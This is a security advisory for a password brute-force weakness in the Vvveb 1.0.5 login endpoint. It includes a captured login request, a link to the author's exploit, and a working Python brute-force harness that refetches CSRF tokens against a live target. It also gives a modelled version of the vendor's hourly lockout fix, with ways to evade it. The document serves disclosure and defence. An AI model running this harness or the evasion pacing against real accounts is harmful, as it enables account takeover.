Vvveb 1.0.5 | User account bruteforce
Basic Information

| Field | Value |
|---|---|
| Software Type | Web App |
| Software Name | Vvveb |
| Affected Version | 1.0.5 |
| Software Vendor | Vvveb |
| Software Link | https://github.com/givanz/Vvveb |
| Severity | Medium |
| CVSS Score | 6.3 |
| Affected Assets | 100+ |
| Date of Discovery | Jan 3rd, 2025 |
Description
The user login endpoint at /user/login is vulnerable to password brute force: the server applies no rate limiting, account lockout or CAPTCHA, so an attacker can submit an unlimited number of login attempts for a given email address. The csrf field in the form does not mitigate this, since a CSRF token only ties the POST to the requester's own session and is available to any client that loads the login page.
Reproduce
To reproduce the issue, register a test account at /user/signup, then sign in with that email and password.
Submit the correct email with an incorrect password:
```http
POST /user/login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------26162393051061393382488967706
Content-Length: 548
Referer: http://127.0.0.1/user/login
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Connection: keep-alive
Cookie: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; PHPSESSID=EzuO8BB8K7BLfydEIx%2C1De1mJA3ONYvZBOIhjeXt-syZFn0%2C
Priority: u=0, i

-----------------------------26162393051061393382488967706
Content-Disposition: form-data; name="csrf"

9viWf6BOwWSbYYxl
-----------------------------26162393051061393382488967706
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------26162393051061393382488967706
Content-Disposition: form-data; name="password"

redshark1231
-----------------------------26162393051061393382488967706
Content-Disposition: form-data; name="redirect"


-----------------------------26162393051061393382488967706--
```
For a wrong password the server renders the login page again with the following message:
Authentication failed, wrong email or password!
For a correct set of credentials the server instead responds with a redirect to /user; following that redirect shows the dashboard:
This is your user dashboard
The difference between these two responses (a redirect to /user versus the failure message) is a reliable oracle for automation.
With that oracle, a password brute-force exploit is straightforward; the author's exploit is published here:
https://gist.github.com/0xHamy/30a305e01e97a02ada381439237b04b5
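The attack loop the page describes, as an added example in Python that is not the author's gist and not Vvveb code. It assumes the login page embeds the token as `<input name="csrf" value="...">`, that the target is reachable at a base URL you pass in, and that any response other than the known failure page (lockout, CAPTCHA, rate limit) should stop the loop. The wordlist, the victim address and the `fake_sender` server stand-in are constructed so the block runs offline:

```python
"""Added example, not the author's gist and not Vvveb code: a brute-force
harness for the /user/login form shown above. Assumptions: the login page
embeds the token as <input name="csrf" value="...">, the base URL, and
that any reply other than the known failure page means the attack is blocked."""
import re
import secrets
import urllib.error
import urllib.request
from http.cookiejar import CookieJar
from typing import Callable, Iterable, Optional, Tuple

CSRF_RE = re.compile(r'name="csrf"\s+value="([^"]+)"')          # assumed markup
FAIL_MSG = "Authentication failed, wrong email or password!"    # response text from the page
Response = Tuple[int, Optional[str], str]                       # (status, Location header, body)
Sender = Callable[[str, str], Response]                         # send(email, password)


def extract_csrf(html: str) -> Optional[str]:
    """Return the csrf hidden-field value from the login page, or None."""
    m = CSRF_RE.search(html)
    return m.group(1) if m else None


def build_multipart(fields: dict, boundary: str) -> bytes:
    """Encode fields the way the browser request on this page does (multipart/form-data, CRLF)."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields.items()]
    return ("".join(parts) + f"--{boundary}--\r\n").encode()


def classify(resp: Response) -> str:
    """'success' on the redirect to /user, 'failed' on the error page, 'blocked'
    for anything else (lockout, CAPTCHA, rate limit) so the loop stops early."""
    status, location, body = resp
    if status in (301, 302, 303, 307, 308) and location and location.rstrip("/").endswith("/user"):
        return "success"
    return "failed" if FAIL_MSG in body else "blocked"


def brute_force(send: Sender, email: str, passwords: Iterable[str]) -> Tuple[Optional[str], int]:
    """Try each password in order; return (password found or None, attempts made)."""
    attempts = 0
    for pw in passwords:
        attempts += 1
        verdict = classify(send(email, pw))
        if verdict == "success":
            return pw, attempts
        if verdict == "blocked":
            break
    return None, attempts


def http_sender(base_url: str) -> Sender:
    """Real transport: fetch a fresh CSRF token, POST one attempt, and do not follow
    redirects so the 302 to /user stays observable (3xx surfaces as HTTPError)."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None
    opener = urllib.request.build_opener(NoRedirect, urllib.request.HTTPCookieProcessor(CookieJar()))

    def send(email: str, password: str) -> Response:
        token = extract_csrf(opener.open(base_url + "/user/login").read().decode(errors="replace"))
        if token is None:
            return 0, None, ""                      # no token: classified as 'blocked'
        boundary = "----brute" + secrets.token_hex(8)
        body = build_multipart({"csrf": token, "email": email, "password": password, "redirect": ""}, boundary)
        req = urllib.request.Request(base_url + "/user/login", data=body, method="POST",
                                     headers={"Content-Type": f"multipart/form-data; boundary={boundary}"})
        try:
            r = opener.open(req)
            return r.status, r.headers.get("Location"), r.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            return e.code, e.headers.get("Location"), e.read().decode(errors="replace")
    return send


def fake_sender(real_password: str, lockout_after: Optional[int] = None) -> Sender:
    """Constructed offline stand-in: behaves like 1.0.5 (unlimited tries), or like a
    server that refuses every attempt once `lockout_after` failures were recorded."""
    state = {"failed": 0}

    def send(email: str, password: str) -> Response:
        if lockout_after is not None and state["failed"] >= lockout_after:
            return 200, None, "Too many failed logins."     # constructed lockout page
        if password == real_password:
            return 302, "http://127.0.0.1/user", ""
        state["failed"] += 1
        return 200, None, f"<html>{FAIL_MSG}</html>"
    return send


if __name__ == "__main__":
    wordlist = ["123456", "password", "s3cret-pw", "letmein"]                                      # constructed
    print(brute_force(fake_sender("s3cret-pw"), "victim@example.com", wordlist))                   # ('s3cret-pw', 3)
    print(brute_force(fake_sender("s3cret-pw", lockout_after=2), "victim@example.com", wordlist))  # (None, 3)
    # Against a lab instance: brute_force(http_sender("http://127.0.0.1"), email, wordlist)
```

`classify` treats only a redirect whose path ends in `/user` as success, so a redirect back to `/user/login` on failure is not mistaken for a hit, and it stops on the first unrecognised response rather than burning through the wordlist against a lockout page. `http_sender` refetches the token and keeps the session cookie jar, which is what makes the csrf field irrelevant to the attack.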
Mitigation
Rate limit login attempts per account and per source IP, lock or progressively delay an account after repeated failures, and add a CAPTCHA to the login form.
Patch
Vvveb's fix adds a failed-logins table keyed by account and hour: each failed attempt increments the count for the current hour, and once that count reaches 10 the account is locked for the rest of that hour.
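The lockout scheme described above, modelled as an added example in Python with sqlite3. This is not Vvveb's patch (which is PHP code in the project itself); the table and column names, the clearing of the counter on a successful login, the injectable clock and the constructed account are assumptions, and the threshold of 10 failures per hour is the figure from the page. The second demo shows the edge case that a calendar-hour bucket leaves open:

```python
"""Added example, not Vvveb's patch: a per-account failed-login counter bucketed
by calendar hour, stored in sqlite3. Table/column names, clearing the counter on
a successful login, and the injectable clock are assumptions; the threshold of
10 failures per hour is the figure given on the page."""
import hashlib
import hmac
import os
import sqlite3
import time
from typing import Callable, Dict, Optional, Tuple

MAX_FAILED_PER_HOUR = 10  # threshold from the page
PBKDF2_ROUNDS = 20_000    # kept low so the demo runs quickly; raise in production


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """PBKDF2-SHA256 with a random 16-byte salt; returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class FailedLoginGuard:
    """Counts failures per (email, hour), like the failed-logins table in the fix."""

    def __init__(self, conn: sqlite3.Connection, now: Callable[[], float] = time.time):
        self.conn, self.now = conn, now
        conn.execute("CREATE TABLE IF NOT EXISTS failed_logins ("
                     "email TEXT NOT NULL, hour INTEGER NOT NULL, count INTEGER NOT NULL, "
                     "PRIMARY KEY (email, hour))")

    def _hour(self) -> int:
        return int(self.now()) // 3600            # calendar-hour bucket, not a sliding window

    def failed_count(self, email: str) -> int:
        row = self.conn.execute("SELECT count FROM failed_logins WHERE email = ? AND hour = ?",
                                (email, self._hour())).fetchone()
        return row[0] if row else 0

    def is_locked(self, email: str) -> bool:
        return self.failed_count(email) >= MAX_FAILED_PER_HOUR

    def record_failure(self, email: str) -> None:
        cur = self.conn.execute("UPDATE failed_logins SET count = count + 1 WHERE email = ? AND hour = ?",
                                (email, self._hour()))
        if cur.rowcount == 0:
            self.conn.execute("INSERT INTO failed_logins (email, hour, count) VALUES (?, ?, 1)",
                              (email, self._hour()))
        self.conn.commit()

    def record_success(self, email: str) -> None:
        self.conn.execute("DELETE FROM failed_logins WHERE email = ?", (email,))
        self.conn.commit()


def login(guard: FailedLoginGuard, users: Dict[str, Tuple[bytes, bytes]], email: str, password: str) -> str:
    """Return 'locked', 'ok' or 'failed'. The lock is checked before the password,
    so a locked account refuses even the right password until the hour rolls over."""
    email = email.strip().lower()                 # one counter per account regardless of casing
    if guard.is_locked(email):
        return "locked"
    rec = users.get(email)
    if rec is not None and hmac.compare_digest(hash_password(password, rec[0])[1], rec[1]):
        guard.record_success(email)
        return "ok"
    guard.record_failure(email)                   # unknown accounts are counted too
    return "failed"


def _fixture(start: float):
    clock = {"t": start}
    guard = FailedLoginGuard(sqlite3.connect(":memory:"), now=lambda: clock["t"])
    users = {"victim@example.com": hash_password("s3cret-pw")}   # constructed account
    return clock, guard, users


def demo() -> Tuple[str, int, str]:
    """Constructed scenario: ten wrong guesses lock the account, the correct
    password is then refused, and the lock lapses in the next calendar hour."""
    clock, guard, users = _fixture(1735826854.0)  # constructed timestamp (Jan 2025)
    for i in range(MAX_FAILED_PER_HOUR):
        login(guard, users, "victim@example.com", f"guess{i}")
    locked = login(guard, users, "victim@example.com", "s3cret-pw")
    count = guard.failed_count("victim@example.com")
    clock["t"] += 3600                            # next hour: a fresh, empty bucket
    return locked, count, login(guard, users, "victim@example.com", "s3cret-pw")


def boundary_demo() -> Tuple[bool, int]:
    """Caveat: buckets are calendar hours, so 9 guesses at hh:59 plus 9 more at
    (hh+1):00 never trip the lock; returns (locked?, count in the new hour)."""
    clock, guard, users = _fixture(482174 * 3600 + 3540.0)   # hh:59:00, constructed
    for i in range(9):
        login(guard, users, "victim@example.com", f"a{i}")
    clock["t"] += 60                              # crosses into the next hour
    for i in range(9):
        login(guard, users, "victim@example.com", f"b{i}")
    return guard.is_locked("victim@example.com"), guard.failed_count("victim@example.com")


if __name__ == "__main__":
    print(demo())            # ('locked', 10, 'ok')
    print(boundary_demo())   # (False, 9)
```

Two practitioner caveats follow from the model. First, an hourly bucket is not a sliding window: an attacker who paces guesses at 9 per hour is never locked, and a burst straddling an hour boundary gets almost 20 attempts within a couple of minutes, as `boundary_demo` shows. Second, locking the account (rather than the source) means anyone who knows a victim's email can lock them out with 10 junk requests, and it does nothing against password spraying, where one IP tries a single password against many accounts. The per-IP rate limiting and CAPTCHA from the Mitigation section are still worth adding alongside this fix.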
Posted on: January 10, 2025 09:25 PM